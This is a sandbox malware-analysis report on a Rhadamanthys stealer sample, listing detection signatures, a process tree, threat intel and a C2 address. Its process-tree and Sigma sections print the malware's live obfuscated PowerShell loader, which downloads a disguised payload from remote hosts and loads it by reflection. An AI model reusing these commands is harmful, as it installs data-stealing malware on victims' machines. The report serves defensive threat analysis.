Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
good.exe

Overview

General Information

Sample name:good.exe
Analysis ID:1595244
MD5:1f060be9fbfe90811a71414791ab8c1b
SHA1:5ecbda765ea1c558ef61dc5933ab7aefc279e1b3
SHA256:b682165c83920ef53701d66dbc579701c402201b8dd0c150a7f3fff5195274fd
Tags:exewormuser-Joker
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • good.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\good.exe" MD5: 1F060BE9FBFE90811A71414791AB8C1B)
    • cmd.exe (PID: 7520 cmdline: cmd.exe /c fwr.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7592 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 7916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@RgBy@G8@bQBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@p@Ds@I@@g@C@@J@B0@GU@e@B0@C@@PQ@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@Ds@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@UgBl@GY@b@Bl@GM@d@Bp@G8@bg@u@EE@cwBz@GU@bQBi@Gw@eQBd@Do@OgBM@G8@YQBk@Cg@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@p@Ds@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@9@C@@RwBl@HQ@LQBD@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@LQBi@Hk@d@Bl@EE@cgBy@GE@eQ@g@CQ@ZQBu@GM@V@Bl@Hg@d@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B0@Hk@c@Bl@C@@PQ@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C4@RwBl@HQ@V@B5@H@@ZQ@o@Cc@d@Bl@HM@d@Bw@G8@dwBl@HI@cwBo@GU@b@Bs@C4@S@Bv@GE@YQBh@GE@YQBh@HM@Z@Bt@GU@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bt@GU@d@Bo@G8@Z@@g@D0@I@@k@HQ@eQBw@GU@LgBH@GU@d@BN@GU@d@Bo@G8@Z@@o@Cc@b@Bm@HM@ZwBl@GQ@Z@Bk@GQ@Z@Bk@GQ@YQ@n@Ck@LgBJ@G4@dgBv@Gs@ZQ@o@CQ@bgB1@Gw@b@@s@C@@WwBv@GI@agBl@GM@d@Bb@F0@XQ@g@Cg@Jw@g@HQ@e@B0@C4@YwBo@EE@RgBB@G0@aw@v@HM@ZQBs@Gk@ZgBf@GM@aQBs@GI@dQBw@C8@N@@2@C4@Ng@y@DI@Lg@w@DY@Lg@y@DY@Lw@v@Do@Jw@s@C@@Jw@w@Cc@L@@g@Cc@UwB0@GE@cgB0@HU@c@BO@GE@bQBl@Cc@L@@g@Cc@UgBl@Gc@QQBz@G0@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.chAFAmk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
            • RegAsm.exe (PID: 7256 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • fontdrvhost.exe (PID: 3384 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
              • WerFault.exe (PID: 2188 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 676 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • rundll32.exe (PID: 7720 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000003.2003819326.0000000002BF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        0000000C.00000002.2037609353.0000000003070000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          0000000B.00000002.2010712842.0000000002F70000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            12.3.fontdrvhost.exe.5120000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              12.3.fontdrvhost.exe.5340000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                12.3.fontdrvhost.exe.5340000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi64_8112.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Base64 Encoded PowerShell Command Detected
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J
                    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@